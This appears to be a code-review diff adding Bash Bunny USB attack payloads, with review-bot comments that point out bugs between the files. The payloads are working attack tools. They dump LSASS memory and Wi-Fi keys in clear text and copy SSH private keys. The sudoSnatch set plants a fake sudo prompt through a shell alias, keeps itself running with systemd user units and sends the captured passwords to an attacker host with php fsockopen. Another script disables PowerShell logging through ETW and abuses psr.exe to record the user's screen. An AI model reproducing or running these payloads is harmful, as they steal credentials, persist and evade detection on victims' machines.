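Review bot: the `Set-MpPreference -DisableRealtimeMonitoring $true` line is only undone by a keystroke typed after a fixed `DELAY 35000`; if run.ps1 takes longer than 35 seconds, the elevated console is closed, or the device is pulled before the final `Set-MpPreference -DisableRealtimeMonitoring $false`, the test machine is left with Defender real-time protection switched off. The re-enable should be guarded inside run.ps1 (a `try`/`finally`) rather than typed from the duck script, and this file has none of the `# Title/Author/Category` header lines the other payloads in the change carry, so nothing documents that it changes Defender settings at all.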
@@ -0,0 +1,9 @@
#!/bin/bash
LED SETUP
ATTACKMODE STORAGE HID VID_0X0D8C PID_0X0012
LED ATTACK
LED R B
QUACK switch1/duck_code.txt
sync;sleep 1;sync
LED FINISH
LED G

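Review bot: `LED R B` immediately overrides `LED ATTACK`, and `LED G` overrides `LED FINISH`, so the standard ATTACK and FINISH patterns are never shown; keep one form or the other. The hard-coded `VID_0X0D8C PID_0X0012` on the `ATTACKMODE` line and the `switch1/duck_code.txt` path are undocumented, and the file has no header metadata; a README for this payload should state both.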
@@ -0,0 +1,159 @@
## ##
## Ducked script by scaery v.1.0 ##
## ________ __ .___ ##
## \______ \ __ __ ____ | | __ ____ __| _/ ##
## | | \| | \_/ ___\| |/ // __ \ / __ | ##
## | ` \ | /\ \___| <\ ___// /_/ | ##
## /_______ /____/ \___ >__|_ \\___ >____ | ##
## \/ \/ \/ \/ \/ ##
## ##
## Windows Enumeration - LSASS Dump - Wifi Credential Dumper ##
## ##
####################################################################

$switch = "switch1"
$usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name
$usb_loot = "loot\"
$date = Get-Date -UFormat "%Y-%m-%d-%H-%M"
$loot = $usb + $usb_loot + $env:computername + "_" + $date
$usb_create = New-Item -ItemType directory $loot
$proc = "$usb\payloads\$switch\procdump.txt"
$proc_decode = certutil -decode $proc exec.exe
$procdump = "$usb\payloads\$switch\exec.exe"
$proc_run = cmd.exe /c exec.exe -ma lsass.exe -accepteula "$loot\$date-lsass.$env:computername.dmp"
$wifi = (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Out-File $loot\$date-wifidump.log

$lines="------------------------------------------"
function whost($a) {
Write-Host
Write-Host -ForegroundColor Green $lines
Write-Host -ForegroundColor Green " "$a
Write-Host -ForegroundColor Green $lines
}

whost "Windows Enumeration Script v 0.1
original by absolomb
modified by scaery
!!!!!!!!!"

$commands = [ordered]@{
'Basic System Information' = 'Start-Process "systeminfo" -NoNewWindow -Wait';
'Environment Variables' = 'Get-ChildItem Env: | ft Key,Value';
'Network Information' = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
'DNS Servers' = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
'ARP cache' = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
'Routing Table' = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
'Network Connections' = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
'Connected Drives' = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
|
||||
'Firewall Config' = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
|
||||
'Current User' = 'Write-Host $env:UserDomain\$env:UserName';
|
||||
'User Privileges' = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
|
||||
'Local Users' = 'Get-LocalUser | ft Name,Enabled,LastLogon';
|
||||
'Logged in Users' = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft';
|
||||
'Credential Manager' = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
|
||||
'User Autologon Registry Items' = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
|
||||
'Local Groups' = 'Get-LocalGroup | ft Name';
|
||||
'Local Administrators EN' = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
|
||||
'Local Administrators DE' = 'Get-LocalGroupMember Administratoren | ft Name, PrincipalSource';
|
||||
'User Directories' = 'Get-ChildItem C:\Users | ft Name';
|
||||
'Searching for SAM backup files' = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
|
||||
'Running Processes' = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
|
||||
'Installed Software Directories' = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
|
||||
'Software in Registry' = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
|
||||
'Folders with Everyone Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
|
||||
'Folders with BUILTIN\User Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
|
||||
'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
|
||||
'Unquoted Service Paths' = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
|
||||
'Scheduled Tasks' = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
|
||||
'Tasks Folder' = 'Get-ChildItem C:\Windows\Tasks | ft';
|
||||
'Startup Commands' = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
|
||||
}
|
||||
|
||||
function RunCommands($commands) {
|
||||
ForEach ($command in $commands.GetEnumerator()) {
|
||||
whost $command.Name
|
||||
Invoke-Expression $command.Value
|
||||
}
|
||||
}
|
||||
|
||||
# Disable Notifications
|
||||
|
||||
New-Item HKCU:\Software\Policies\Microsoft\Windows\Explorer -Force
|
||||
$registryPath1 = "HKCU:\Software\Policies\Microsoft\Windows\Explorer"
|
||||
$Name1 = "DisableNotificationCenter"
|
||||
$value1 = "00000001"
|
||||
IF(!(Test-Path $registryPath1)) {
|
||||
New-Item -Path $registryPath1 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance -Force
|
||||
$registryPath2 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance"
|
||||
$Name2 = "Enabled"
|
||||
$value2 = "00000000"
|
||||
IF(!(Test-Path $registryPath2)) {
|
||||
New-Item -Path $registryPath2 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel -Force
|
||||
$registryPath3 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel"
|
||||
$Name3 = "Enabled"
|
||||
$value3 = "00000000"
|
||||
IF(!(Test-Path $registryPath3)) {
|
||||
New-Item -Path $registryPath3 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay -Force
|
||||
$registryPath4 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay"
|
||||
$Name4 = "Enabled"
|
||||
$value4 = "00000000"
|
||||
IF(!(Test-Path $registryPath4)) {
|
||||
New-Item -Path $registryPath4 -Force | Out-Null
|
||||
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
} ELSE {
|
||||
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
|
||||
-PropertyType DWORD -Force | Out-Null
|
||||
}
|
||||
|
||||
$notify_disable={
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0
|
||||
}
|
||||
$notify_enable={
|
||||
Remove-Item $registryPath1 -Force | Out-Null
|
||||
Remove-Item $registryPath2 -Force | Out-Null
|
||||
Remove-Item $registryPath3 -Force | Out-Null
|
||||
Remove-Item $registryPath4 -Force | Out-Null
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 1
|
||||
}
|
||||
|
||||
##################### EXECUTION STEPS ######################################
|
||||
|
||||
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
|
||||
|
||||
Invoke-Command -Scriptblock $notify_disable
|
||||
|
||||
RunCommands($commands) > $loot\$date-winenum.log
|
||||
|
||||
whost "Procdump LSASS! AV-free! Caution: Not Defender aware!"
|
||||
$proc_run
|
||||
|
||||
whost "Dumping Wifi Credentials to USB"
|
||||
$wifi
|
||||
|
||||
whost "Hiding traces and notifications"
|
||||
Invoke-Command -Scriptblock $notify_enable
|
|
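Review bot: The "EXECUTION STEPS" block at the bottom does not run the LSASS or Wi-Fi dumps; they run at assignment time. `$proc_decode = certutil -decode ...`, `$proc_run = cmd.exe /c exec.exe ...` and `$wifi = (netsh wlan show profiles) | ... | Out-File ...` all execute where they are assigned near the top of the file, before the notification registry writes and before `RunCommands`, and the later bare `$proc_run` / `$wifi` lines only echo the stored output (`$wifi` is `$null`, since `Out-File` returns nothing). If the ordering under the `whost` banners is meant to be real, make those three script blocks or functions. Related: `$procdump` is assigned and never used, and `exec.exe` is decoded into and run from whatever the current directory is (typically `C:\Windows\System32` for an elevated shell from the Run box), not `$usb\payloads\$switch\`. `RunCommands($commands) > ...winenum.log` also captures less than it looks like: `whost` uses `Write-Host`, and every `Start-Process ... -NoNewWindow -Wait` entry writes the child's output to the console rather than the pipeline, so none of those sections reach the log file. Finally, `Set-ExecutionPolicy -Scope CurrentUser ... Bypass -Force` is a persistent change to the user's profile and is never restored.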
@ -0,0 +1,49 @@
|
|||
# Title: sshDump
|
||||
# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: GNU/Linux.
|
||||
# Attackmodes: HID, Storage.
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Looting]
|
||||
Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
|
||||
Q ENTER
|
||||
Q DELAY 2000
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
|
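Review bot: The block-device discovery (`lol=$(lsblk | grep 1.8G)` then `awk '{print $1}'`) keys on partition size and will match any device of roughly that size, or several `lsblk` lines if more than one is present, in which case `$disk` holds multiple names and `udisksctl mount -b /dev/$disk` fails; the header's "Target: GNU/Linux." should spell out the real requirements, which are udisks2 on the host, a desktop with `CTRL-ALT t` bound to a terminal, and exactly one Bash Bunny storage partition of that size. `udisksctl mount -b` also takes no mount-point argument, so the `/tmp/tmppp` operand is misleading (the real mount point is read back from `lsblk` column 7 two lines later); drop it. Note too that the "Prevent storing history" step only affects the shell the payload opens: from a detection standpoint the terminal launch, the udisks mount event and the copy all remain visible in the journal and in auditd, so the label overstates what `unset HISTFILE` achieves.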
@ -0,0 +1,48 @@
|
|||
## About:
|
||||
* Title: sudoSnatch
|
||||
* Description: sudoSnatch grabs plain text passwords remotely/locally.
|
||||
* AUTHOR: drapl0n
|
||||
* Version: 1.0
|
||||
* Category: Credentials
|
||||
* Target: Unix-like operating systems with systemd.
|
||||
* Attackmodes: HID, Storage
|
||||
|
||||
## sudoSnatch: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally.
|
||||
|
||||
### Features:
|
||||
* Plain text passwords.
|
||||
* Detailed password logs.
|
||||
* Persistent
|
||||
* Autostart payload on boot.
|
||||
|
||||
### Workflow:
|
||||
* Injecting payload on target's system.
|
||||
* Checks whether internet is connected to the target system.
|
||||
* If internet is connected then it sends clear text passwords to attacker.
|
||||
|
||||
### Changes to be made in payload.sh:
|
||||
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `10`.
|
||||
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `14`.
|
||||
|
||||
### LED Status:
|
||||
* `SETUP` : MAGENTA
|
||||
* `ATTACK` : YELLOW
|
||||
* `FINISH` : GREEN
|
||||
|
||||
### Directory Structure of payload components:
|
||||
| FileName | Directory |
|
||||
| -------------- | ----------------------------- |
|
||||
| payload.txt | /payloads/switch1/ |
|
||||
| payload.sh | /payloads/ |
|
||||
| shell | /payloads/library/sudoSnatch/ |
|
||||
| systemMgr | /payloads/library/sudoSnatch/ |
|
||||
|
||||
* Note: Create directory named `sudoSnatch` in `/payloads/library/`
|
||||
### Usage:
|
||||
1. Inject payload into target's system.
|
||||
2. Start netcat listner on attacking system:
|
||||
|
||||
* `nc -l -p <port number>` use this command to fetch passwords.
|
||||
|
||||
#### Support me if you like my work:
|
||||
* https://twitter.com/drapl0n
|
|
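Review bot: The "Persistent" feature and the "Checks whether internet is connected" workflow item are both unqualified. Persistence is implemented as two user-level systemd units (`systemBUS.service` and `reboot.service` under `~/.config/systemd/user`), a `sudo` alias appended to `~/.bashrc` / `~/.zshrc`, and files under `/var/tmp/.system`; the README has no removal or cleanup section listing these artifacts, and anyone testing this on a lab machine needs to know exactly what to undo, so add one. Usage step 2 should also say that the listener receives the entire `sysLog` file again on every loop iteration (payload.sh runs `cat /var/tmp/.system/sysLog` each time the ping succeeds), not only new entries. Minor: "imediately" and "listner" are misspelled, and the "line no `10`" / "`14`" references will silently go stale the first time payload.sh is edited; refer to the `php -r` line and the `sleep 15m` line by content instead.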
@ -0,0 +1,23 @@
|
|||
#!/bin/bash
|
||||
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||
mkdir /var/tmp/.system
|
||||
lol=$(lsblk | grep 1.8G)
|
||||
disk=$(echo $lol | awk '{print $1}')
|
||||
mntt=$(lsblk | grep $disk | awk '{print $7}')
|
||||
cp -r $mntt/payloads/library/sudoSnatch/systemMgr /var/tmp/.system/
|
||||
chmod +x /var/tmp/.system/systemMgr
|
||||
touch /var/tmp/.system/sysLog
|
||||
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||
chmod +x /var/tmp/.system/systemBus
|
||||
mkdir -p ~/.config/systemd/user
|
||||
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||
chmod +x /var/tmp/.system/reboot
|
||||
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||
systemctl --user daemon-reload
|
||||
systemctl --user enable --now systemBUS.service
|
||||
systemctl --user start --now systemBUS.service
|
||||
systemctl --user enable --now reboot.service
|
||||
systemctl --user start --now reboot.service
|
||||
cp -r $mntt/payloads/library/sudoSnatch/shell /tmp/
|
||||
chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
|
|
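Review bot: The `$?` inside the double-quoted `echo -e` on the `php -r` line is expanded by the shell that writes the file, not by the generated loop, so `/var/tmp/.system/systemBus` ends up containing `if [ 0 -eq 0 ]` (the exit status of the preceding `touch`) and the connectivity check the README advertises never happens: the loop opens the socket and ships the log on every iteration regardless of the ping result. The nested quoting in `exec("\"cat ... "<&3 >&3 2>&3"\"")` happens to balance, but only because adjacent quoted and unquoted segments are rejoined by `echo`; the generated script and the two unit files belong in `library/sudoSnatch/` as plain files that a reviewer can read, not in escaped `echo -e` strings. Smaller points: `-no-browser` on both `ExecStart=` lines is passed as `$1` to a script that never reads it, `mkdir /var/tmp/.system` has no `-p` and fails on a second run, and `systemctl --user start --now` after `enable --now` is redundant.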
@ -0,0 +1,56 @@
|
|||
# Title: sudoSnatch
|
||||
# Description: sudoSnatch grabs plain text passwords remotely/locally.
|
||||
# AUTHOR: drapl0n
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Unix-like operating systems with systemd.
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE STORAGE HID
|
||||
GET SWITCH_POSITION
|
||||
LED ATTACK
|
||||
Q DELAY 1000
|
||||
Q CTRL-ALT t
|
||||
Q DELAY 1000
|
||||
|
||||
# [Prevent storing history]
|
||||
Q STRING unset HISTFILE
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Fetching BashBunny's block device]
|
||||
Q STRING lol='$(lsblk | grep 1.8G)'
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [Mounting BashBunny]
|
||||
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
|
||||
Q ENTER
|
||||
Q DELAY 1400
|
||||
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
|
||||
# [transfering payload script]
|
||||
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
|
||||
Q ENTER
|
||||
Q STRING chmod +x /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q STRING /tmp/./payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 5000
|
||||
Q STRING rm /tmp/payload.sh
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
|
||||
# [Unmounting BashBunny]
|
||||
Q STRING udisksctl unmount -b /dev/'$disk'
|
||||
Q ENTER
|
||||
Q DELAY 500
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
LED FINISH
|
|
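Review bot: `GET SWITCH_POSITION` is fetched but never used; every path is hard-coded (`/payloads/payload.sh`, and `/payloads/library/sudoSnatch/...` in payload.sh), so either drop the line or use `${SWITCH_POSITION}` so the payload behaves the same from switch2, as the README's directory table implies it can. The device-discovery and mount block (`lol=`, `disk=`, `udisksctl mount`, `mntt=`) is copied verbatim from sshDump's payload.txt with only the post-mount `DELAY` changed (1400 here, 2000 there); it belongs in one shared helper rather than two diverging copies.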
@ -0,0 +1,12 @@
|
|||
#!/bin/bash
|
||||
ls -a ~/ | grep 'zshrc' &> /dev/null
|
||||
if [ $? = 0 ]; then
|
||||
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
|
||||
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.zshrc
|
||||
fi
|
||||
|
||||
ls -a ~/ | grep 'bashrc' &> /dev/null
|
||||
if [ $? = 0 ]; then
|
||||
echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
|
||||
echo "systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service" >> ~/.bashrc
|
||||
fi
|
|
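Review bot: `ls -a ~/ | grep 'zshrc'` matches any filename containing the substring (`.zshrc.bak`, `.zshrc.pre-oh-my-zsh`), not the rc file itself; `[ -f ~/.zshrc ]` is the idiom, and the same applies to the bashrc branch. The appends are unconditional, so each run adds another alias line and another `systemctl` line, and the second appended line runs four `systemctl --user` commands on every interactive shell start, which is slow and user-visible (systemd prints errors to the terminal if the units are missing). From a detection standpoint this is the easiest artifact of the whole payload to spot: a `sudo` alias pointing at `/var/tmp/.system/systemMgr` in a user's rc file.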
@ -0,0 +1,5 @@
|
|||
#!/bin/bash
|
||||
echo -n "[sudo] password for $(whoami):"
|
||||
IFS="" read -s pass
|
||||
echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog
|
||||
echo -e "\nSorry, try again."
|
|
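Review bot: The file this script appends to is the most sensitive thing the payload creates, yet `/var/tmp/.system/sysLog` is created by `touch` under the default umask in payload.sh and written here with no permission handling, so the captured password is readable by every local user and process on the machine, not just the operator; that is a real exposure for the target beyond the intended one and should at least be called out in the README. The `[sudo] password for $(whoami):` prompt printed by `bash` rather than by `sudo` is also a usable audit signature, which is worth noting for anyone writing detections for this payload.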
@ -0,0 +1,29 @@
|
|||
# "Microsoft Windows" Problem Steps Recorder
|
||||
|
||||
- Title: Win_ProblemStepsRecorder
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Microsoft Windows
|
||||
- Category: Credentials
|
||||
|
||||
## Description
|
||||
|
||||
1) Partially avoids "PowerShell Script Block Logging".
|
||||
2) Closing of all windows.
|
||||
3) Hide "PowerShell" window.
|
||||
4) Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
|
||||
5) Writes the file system cache to disk.
|
||||
6) Safely eject.
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constants :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly RECORDER_TIME=300
|
||||
|
||||
|
||||
```
|
|
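Review bot: The Description list repeats the comment headers from payload.ps1 but says nothing about what the user receives: the `.zip` written to `loot\<COMPUTERNAME>_record.zip` contains an `.mht` with the screenshots, and payload.txt's NOTE about opening it in Internet Explorer belongs here, not only in a script header. The Configuration section should state that `RECORDER_TIME` is in seconds (it is passed to `Start-Sleep -Seconds`) and that `/maxsc 999` caps the number of screenshots regardless of duration. Item 2, "Closing of all windows", is really `Stop-Process` on explorer.exe, which makes the taskbar and desktop disappear for the whole recording, and "Category: Credentials" does not fit a screen recorder.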
@ -0,0 +1,50 @@
|
|||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
#
|
||||
|
||||
Param (
|
||||
[String] $BB_VOLUME,
|
||||
[Int] $RECORDER_TIME
|
||||
)
|
||||
|
||||
# Partially avoids "PowerShell Script Block Logging".
|
||||
#
|
||||
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
|
||||
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
|
||||
$etw_provider.SetValue($null, $event_provider)
|
||||
|
||||
# Closing of all windows.
|
||||
#
|
||||
Get-Process -Name "explorer" | Stop-Process
|
||||
|
||||
# Hide "PowerShell" window.
|
||||
#
|
||||
$Script:showWindowAsync = Add-Type -MemberDefinition @"
|
||||
[DllImport("user32.dll")]
|
||||
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
|
||||
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
|
||||
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
|
||||
|
||||
If ((Test-Path -Path "C:\Windows\System32\psr.exe")) {
|
||||
|
||||
$bb_loot = "${BB_VOLUME}loot\"
|
||||
$computer_name = $env:COMPUTERNAME
|
||||
|
||||
# Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
|
||||
#
|
||||
(C:\Windows\System32\psr.exe /start /sc 1 /maxsc 999 /gui 0 /sketch 1 /slides 1 /output "${bb_loot}${computer_name}_record.zip") | Out-Null
|
||||
Start-Sleep -Seconds $RECORDER_TIME
|
||||
(C:\Windows\System32\psr.exe /stop) | Out-Null
|
||||
|
||||
}
|
||||
|
||||
"Win_ProblemStepsRecorder terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
|
||||
|
||||
# Writes the file system cache to disk.
|
||||
#
|
||||
Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
|
||||
|
||||
# Safely eject.
|
||||
#
|
||||
(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")
|
|
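Review bot: `done.txt` is written with a relative path (`.\..\..\loot\done.txt`) while the loot itself uses the absolute `$bb_loot`; the relative form only works because payload.txt did `CD` into `${BB_SWITCH}` first, and if that `CD` fails the file lands elsewhere and the Bunny's `until [ -f /root/udisk/loot/done.txt ]` loop never terminates. Hoist `$bb_loot` out of the `If` and write `"${bb_loot}done.txt"`. The `If ((Test-Path -Path "C:\Windows\System32\psr.exe"))` block also has no `Else`, so on a host without psr.exe the script still reports "terminated", ejects, and leaves a loot folder with no indication that nothing was recorded; write a distinct status in that case.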
@ -0,0 +1,91 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Win_ProblemStepsRecorder
|
||||
#
|
||||
# Description:
|
||||
# Abuse of "Windows Problem Steps Recorder"
|
||||
# to spy on a user's activities.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Since Microsoft Windows 7 and 2008 R2
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||
#
|
||||
# NOTE
|
||||
# ===============
|
||||
# Use the browser "Internet Explorer" to read the ".mht" file correctly.
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Cyan inverted single blink ...................... SPECIAL
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly RECORDER_TIME=300
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 7000
|
||||
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||
Q DELAY 7000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
